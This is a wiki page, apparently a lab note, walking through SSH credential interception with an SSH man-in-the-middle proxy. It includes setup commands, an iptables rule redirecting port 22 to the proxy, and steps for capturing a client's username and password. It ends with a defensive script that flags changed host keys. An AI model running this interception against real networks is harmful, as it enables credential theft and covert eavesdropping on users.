Difference between revisions of "MITM: mitm ssh"
Onnowpurbo (talk | contribs)
Revision as of 07:04, 7 April 2017
Source: http://www.atechnote.com/2016/10/intercept-username-and-password-using.html
==Download==
git clone https://github.com/mitmproxy/mitmproxy.git
==Generate Keys==
./mitmkeys
The generated keys are placed in ~/.mitmkeys
==Install the SSH key on the target server==
# Install SSH key
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver
==Run the proxy==
Then run the proxy, pointing it at the victimserver.
./mitmproxy_ssh -H victimserver
This runs the proxy on localhost:2222
Now simply connect to the local proxy:
ssh localhost -p 2222
And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.
==Diagram==
client --> mitmproxy --> ssh server
- target server ip: 192.168.202.124
==Installation==
$ sudo pip install twisted
$ sudo apt-get install python-service-identity
$ pip install pycrypto
==Download==
$ git clone https://github.com/saironiq/mitmproxy.git
3- If you cannot run mitmreplay_ssh, the pycrypto version you installed may have a different module structure, so modify the file mitmproxy/mitmproxy/sshdebug.py as follows:
-- at line 655, change the call to:
mpints.append(cnumber.bytes_to_long(
-- at line 11, add the following import:
from Crypto.Util import number as cnumber
4- Generate keys
$ cd mitmproxy
$ sudo ./mitmproxy
==Update firewall==
5- update ip_forward rule and nat
$ sudo sysctl -w net.ipv4.ip_forward=1
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
6- Run mitmproxy_ssh and point it at the target server 192.168.202.124
$ sudo ./mitmproxy_ssh -H 192.168.202.124 -s
7- Now, when the client logs in to the SSH server, the interception is completely transparent to them as long as they do not question the new host key presented by the "server".
- Snapshot of the username and password captured on the mitmproxy PC when the client connects to server 192.168.202.124 over SSH
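Step 7 only works when the client accepts a host key that differs from the one it previously saw. The following client-side check is an added example (not code from the original page or the mitmproxy project): it parses plain known_hosts lines, computes OpenSSH-style SHA256 fingerprints, and flags a presented key that does not match the pinned one. The key blobs and the known_hosts line are constructed samples, not real server keys.

```python
import base64
import hashlib
import struct

def _ssh_string(b: bytes) -> bytes:
    # SSH wire encoding: 4-byte big-endian length followed by the bytes
    return struct.pack(">I", len(b)) + b

def make_ed25519_blob(raw_key: bytes) -> str:
    # Constructed sample key blob (not a real server key): an ssh-ed25519
    # public key is the string "ssh-ed25519" plus the 32-byte key, each length-prefixed
    assert len(raw_key) == 32
    blob = _ssh_string(b"ssh-ed25519") + _ssh_string(raw_key)
    return base64.b64encode(blob).decode()

def fingerprint(blob_b64: str) -> str:
    # OpenSSH-style fingerprint: SHA256 of the decoded blob, base64 without padding
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def parse_known_hosts(text: str) -> dict:
    # Map (host, key type) -> key blob for plain (unhashed) known_hosts lines
    pinned = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("|1|"):
            continue  # comments and hashed (|1|...) entries are not handled here
        hosts, ktype, blob = line.split()[:3]
        for host in hosts.split(","):
            pinned[(host, ktype)] = blob
    return pinned

def check_host_key(pinned: dict, host: str, ktype: str, presented: str):
    # "mismatch" is exactly the condition step 7 needs the user to ignore:
    # the key offered on this connection differs from the one pinned for the real server
    expected = pinned.get((host, ktype))
    if expected is None:
        return "unknown", "no pinned %s key for %s" % (ktype, host)
    if expected == presented:
        return "ok", fingerprint(presented)
    return "mismatch", "pinned %s, presented %s" % (fingerprint(expected), fingerprint(presented))

if __name__ == "__main__":
    real = make_ed25519_blob(bytes(range(32)))       # constructed "real server" key
    proxy = make_ed25519_blob(bytes(range(32, 64)))  # constructed key offered by a proxy
    known = parse_known_hosts("192.168.202.124 ssh-ed25519 " + real + "\n")
    print(check_host_key(known, "192.168.202.124", "ssh-ed25519", proxy))
```

OpenSSH performs the same comparison itself; with `StrictHostKeyChecking yes` in ssh_config it refuses a connection whose host key changed instead of asking the user.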